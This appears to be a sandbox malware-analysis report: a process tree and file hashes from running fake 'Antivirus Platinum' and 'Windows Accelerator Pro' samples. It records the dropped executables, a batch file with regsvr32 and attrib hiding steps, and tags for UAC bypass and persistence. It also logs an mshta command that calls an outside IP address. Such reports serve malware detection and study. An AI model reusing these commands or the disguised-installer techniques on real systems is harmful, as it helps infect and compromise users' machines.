                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,7458190401956710881,14603533738316766668,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:1
                                                                                                  2⤵
                                                                                                    PID:4480
                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,7458190401956710881,14603533738316766668,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3360 /prefetch:1
                                                                                                    2⤵
                                                                                                      PID:2716
                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,7458190401956710881,14603533738316766668,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5052 /prefetch:1
                                                                                                      2⤵
                                                                                                        PID:4476
                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,7458190401956710881,14603533738316766668,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5072 /prefetch:1
                                                                                                        2⤵
                                                                                                          PID:4552
                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2088,7458190401956710881,14603533738316766668,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3584 /prefetch:8
                                                                                                          2⤵
                                                                                                            PID:3928
                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2088,7458190401956710881,14603533738316766668,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3584 /prefetch:8
                                                                                                            2⤵
                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                            PID:1440
                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,7458190401956710881,14603533738316766668,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2832 /prefetch:1
                                                                                                            2⤵
                                                                                                              PID:4468
                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,7458190401956710881,14603533738316766668,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3508 /prefetch:1
                                                                                                              2⤵
                                                                                                                PID:2140
                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,7458190401956710881,14603533738316766668,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5360 /prefetch:1
                                                                                                                2⤵
                                                                                                                  PID:3096
                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,7458190401956710881,14603533738316766668,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5796 /prefetch:1
                                                                                                                  2⤵
                                                                                                                    PID:2616
                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,7458190401956710881,14603533738316766668,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5800 /prefetch:1
                                                                                                                    2⤵
                                                                                                                      PID:4988
                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2088,7458190401956710881,14603533738316766668,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5496 /prefetch:8
                                                                                                                      2⤵
                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                      PID:1352
                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2088,7458190401956710881,14603533738316766668,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5504 /prefetch:8
                                                                                                                      2⤵
                                                                                                                        PID:4520
                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,7458190401956710881,14603533738316766668,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5508 /prefetch:1
                                                                                                                        2⤵
                                                                                                                          PID:3892
                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,7458190401956710881,14603533738316766668,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5576 /prefetch:1
                                                                                                                          2⤵
                                                                                                                            PID:2540
                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2088,7458190401956710881,14603533738316766668,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5152 /prefetch:8
                                                                                                                            2⤵
                                                                                                                              PID:652
                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,7458190401956710881,14603533738316766668,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1800 /prefetch:1
                                                                                                                              2⤵
                                                                                                                                PID:4988
                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2088,7458190401956710881,14603533738316766668,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6268 /prefetch:8
                                                                                                                                2⤵
                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                PID:2140
                                                                                                                            • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                              C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                              1⤵
                                                                                                                                PID:4820
                                                                                                                              • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                1⤵
                                                                                                                                  PID:2948
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Temp1_Antivirus Platinum.zip\[email protected]
                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\Temp1_Antivirus Platinum.zip\[email protected]"
                                                                                                                                  1⤵
                                                                                                                                  • Drops file in Windows directory
                                                                                                                                  PID:4608
                                                                                                                                  • C:\WINDOWS\302746537.exe
                                                                                                                                    "C:\WINDOWS\302746537.exe"
                                                                                                                                    2⤵
                                                                                                                                    • Checks computer location settings
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    PID:1800
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\8C3F.tmp\302746537.bat" "
                                                                                                                                      3⤵
                                                                                                                                        PID:1856
                                                                                                                                        • C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                          regsvr32 /s c:\windows\comctl32.ocx
                                                                                                                                          4⤵
                                                                                                                                          • Loads dropped DLL
                                                                                                                                          • Modifies registry class
                                                                                                                                          PID:1280
                                                                                                                                        • C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                          regsvr32 /s c:\windows\mscomctl.ocx
                                                                                                                                          4⤵
                                                                                                                                          • Loads dropped DLL
                                                                                                                                          • Modifies registry class
                                                                                                                                          PID:3272
                                                                                                                                        • \??\c:\windows\antivirus-platinum.exe
                                                                                                                                          c:\windows\antivirus-platinum.exe
                                                                                                                                          4⤵
                                                                                                                                          • Windows security bypass
                                                                                                                                          • Disables RegEdit via registry modification
                                                                                                                                          • Windows security modification
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          • Loads dropped DLL
                                                                                                                                          • Modifies Internet Explorer settings
                                                                                                                                          • Modifies Internet Explorer start page
                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                          • System policy modification
                                                                                                                                          PID:2964
                                                                                                                                        • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                          attrib +h c:\windows\antivirus-platinum.exe
                                                                                                                                          4⤵
                                                                                                                                          • Drops file in Windows directory
                                                                                                                                          • Views/modifies file attributes
                                                                                                                                          PID:2288
                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
                                                                                                                                    1⤵
                                                                                                                                    • Enumerates system info in registry
                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                                                                    PID:1404
                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd6b8046f8,0x7ffd6b804708,0x7ffd6b804718
                                                                                                                                      2⤵
                                                                                                                                        PID:4908
                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2136,14768237905812386365,200524983412513724,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 /prefetch:3
                                                                                                                                        2⤵
                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                        PID:3788
                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2136,14768237905812386365,200524983412513724,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2148 /prefetch:2
                                                                                                                                        2⤵
                                                                                                                                          PID:3024
                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2136,14768237905812386365,200524983412513724,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2864 /prefetch:8
                                                                                                                                          2⤵
                                                                                                                                            PID:4180
                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,14768237905812386365,200524983412513724,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:1
                                                                                                                                            2⤵
                                                                                                                                              PID:3656
                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,14768237905812386365,200524983412513724,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:1
                                                                                                                                              2⤵
                                                                                                                                                PID:372
                                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,14768237905812386365,200524983412513724,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5044 /prefetch:1
                                                                                                                                                2⤵
                                                                                                                                                  PID:820
                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,14768237905812386365,200524983412513724,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5024 /prefetch:1
                                                                                                                                                  2⤵
                                                                                                                                                    PID:2396
                                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,14768237905812386365,200524983412513724,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4124 /prefetch:1
                                                                                                                                                    2⤵
                                                                                                                                                      PID:216
                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2136,14768237905812386365,200524983412513724,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=4024 /prefetch:8
                                                                                                                                                      2⤵
                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                      PID:4076
                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2136,14768237905812386365,200524983412513724,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4020 /prefetch:8
                                                                                                                                                      2⤵
                                                                                                                                                        PID:1724
                                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,14768237905812386365,200524983412513724,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4380 /prefetch:1
                                                                                                                                                        2⤵
                                                                                                                                                          PID:468
                                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,14768237905812386365,200524983412513724,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5660 /prefetch:1
                                                                                                                                                          2⤵
                                                                                                                                                            PID:4512
                                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2136,14768237905812386365,200524983412513724,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6116 /prefetch:8
                                                                                                                                                            2⤵
                                                                                                                                                              PID:2520
                                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2136,14768237905812386365,200524983412513724,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6116 /prefetch:8
                                                                                                                                                              2⤵
                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                              PID:4852
                                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,14768237905812386365,200524983412513724,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3688 /prefetch:1
                                                                                                                                                              2⤵
                                                                                                                                                                PID:2532
                                                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,14768237905812386365,200524983412513724,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3756 /prefetch:1
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:3972
                                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,14768237905812386365,200524983412513724,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5604 /prefetch:1
                                                                                                                                                                  2⤵
                                                                                                                                                                    PID:3828
                                                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,14768237905812386365,200524983412513724,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5420 /prefetch:1
                                                                                                                                                                    2⤵
                                                                                                                                                                      PID:2948
                                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2136,14768237905812386365,200524983412513724,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5160 /prefetch:8
                                                                                                                                                                      2⤵
                                                                                                                                                                        PID:2592
                                                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2136,14768237905812386365,200524983412513724,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5448 /prefetch:8
                                                                                                                                                                        2⤵
                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                        PID:2736
                                                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,14768237905812386365,200524983412513724,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2244 /prefetch:1
                                                                                                                                                                        2⤵
                                                                                                                                                                          PID:5104
                                                                                                                                                                      • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                                                        C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                                                        1⤵
                                                                                                                                                                          PID:4276
                                                                                                                                                                        • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                                                          C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                                                          1⤵
                                                                                                                                                                            PID:3300
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Temp1_Windows Accelerator Pro.zip\[email protected]
                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\Temp1_Windows Accelerator Pro.zip\[email protected]"
                                                                                                                                                                            1⤵
                                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                                            PID:3528
                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\guard-nnit.exe
                                                                                                                                                                              C:\Users\Admin\AppData\Roaming\guard-nnit.exe
                                                                                                                                                                              2⤵
                                                                                                                                                                              • UAC bypass
                                                                                                                                                                              • Checks whether UAC is enabled
                                                                                                                                                                              • Sets file execution options in registry
                                                                                                                                                                              • Drops file in System32 directory
                                                                                                                                                                              • Modifies WinLogon for persistence
                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                                              • System policy modification
                                                                                                                                                                              PID:2336
                                                                                                                                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                mshta.exe "http://93.115.82.248/?0=1&1=1&2=9&3=i&4=9200&5=1&6=1111&7=ncfxgriler"
                                                                                                                                                                                3⤵
                                                                                                                                                                                • Blocklisted process makes network request
                                                                                                                                                                                PID:4348
                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                              "C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\TEMP1_~2.ZIP\ENDERM~1.EXE" >> NUL
                                                                                                                                                                              2⤵
                                                                                                                                                                                PID:2548
                                                                                                                                                                            • C:\Windows\system32\LogonUI.exe
                                                                                                                                                                              "LogonUI.exe" /flags:0x4 /state0:0xa3973055 /state1:0x41c64e6d
                                                                                                                                                                              1⤵
                                                                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                                              PID:2980
                                                                                                                                                                            • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                                                                                              "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                                                                                              1⤵
                                                                                                                                                                                PID:432
                                                                                                                                                                              • C:\Windows\System32\rundll32.exe
                                                                                                                                                                                C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {9BA05972-F6A8-11CF-A442-00A0C90A8F39} -Embedding
                                                                                                                                                                                1⤵
                                                                                                                                                                                  PID:4944

                                                                                                                                                                                Network

                                                                                                                                                                                MITRE ATT&CK Enterprise v15

                                                                                                                                                                                Replay Monitor

                                                                                                                                                                                Loading Replay Monitor...

                                                                                                                                                                                Downloads

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  152B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  6157d0a8fedf1d29855cb4d1e6d898f7

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  0f4c103c337743a736f20a055b92aefdbedb2e62

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  a56f84908871dfef17a8a6237ebef3e49d4e0113a55e962d6a7057ff07136f1a

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  bda855cfe2a3c4085e855e0525c95eb3c333d7f5abb4652da74bfc65d1b2806d0897ad3704ef961dba9807d4387e996c6fe4d3292cc03a8816cb64c46b077d28

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  152B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  59114de1bbb15f65cc218516396a8f5e

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  d33244597638e29a2b3a5a02dfc39d012840c807

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  88adc4085f5d3d5628c38996a19a87db5631f81d08e623951a5e42f243f3862a

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  b18164962e8b1e1bc0c50f37c87bc814a95d1a865ca93269e66cc5a4599b2f9c76acdbaaf6381c7c087c04f51fffb439db0e5512120709d225ec4f3e30c76546

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  152B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  d5564ccbd62bac229941d2812fc4bfba

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  0483f8496225a0f2ca0d2151fab40e8f4f61ab6d

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  d259ff04090cbde3b87a54554d6e2b8a33ba81e9483acbbe3e6bad15cbde4921

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  300cda7933e8af577bdc1b20e6d4279d1e418cdb0571c928b1568bfea3c231ba632ccb67313ae73ddeae5586d85db95caffaedd23e973d437f8496a8c5a15025

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  152B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  b647ba210f1f0738b0b4637020f36c9c

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  f3e0867ecee379710a9d3e9cea2bf0e2abf7d8d9

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  6500e0bbdb6bc97867f0e89da56d2da717dbbbe044041e798866b7933a6ada1c

                                                                                                                                                                                  SHA512

